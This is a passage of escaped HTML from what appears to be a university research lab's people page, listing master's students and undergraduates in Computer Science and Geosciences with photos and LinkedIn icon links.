17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 